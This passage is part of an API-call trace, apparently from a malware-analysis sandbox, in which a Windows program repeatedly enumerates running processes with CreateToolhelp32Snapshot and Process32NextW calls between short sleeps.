th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0149.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0149.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0149.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0149.781] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0149.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0149.783] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0149.784] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0149.865] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0149.866] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0149.867] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0149.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0149.869] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0149.870] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0149.871] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.872] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0149.873] CloseHandle (hObject=0xc4) returned 1 [0149.873] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0149.878] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.879] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.881] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0149.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.888] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.891] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.894] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.896] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0149.897] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.898] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.899] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.900] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.901] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0149.902] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0149.904] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0149.905] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0149.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0149.907] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0149.908] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0149.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0150.004] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0150.006] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0150.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0150.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0150.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0150.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0150.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0150.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0150.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0150.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0150.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0150.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0150.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0150.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0150.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0150.023] CloseHandle (hObject=0xbc) returned 1 [0150.023] Sleep (dwMilliseconds=0x12c) [0150.344] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0150.349] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.350] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0150.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0150.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.352] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0150.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.354] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0150.355] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0150.356] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0150.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0150.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.358] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.359] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0150.362] Process32NextW (in: 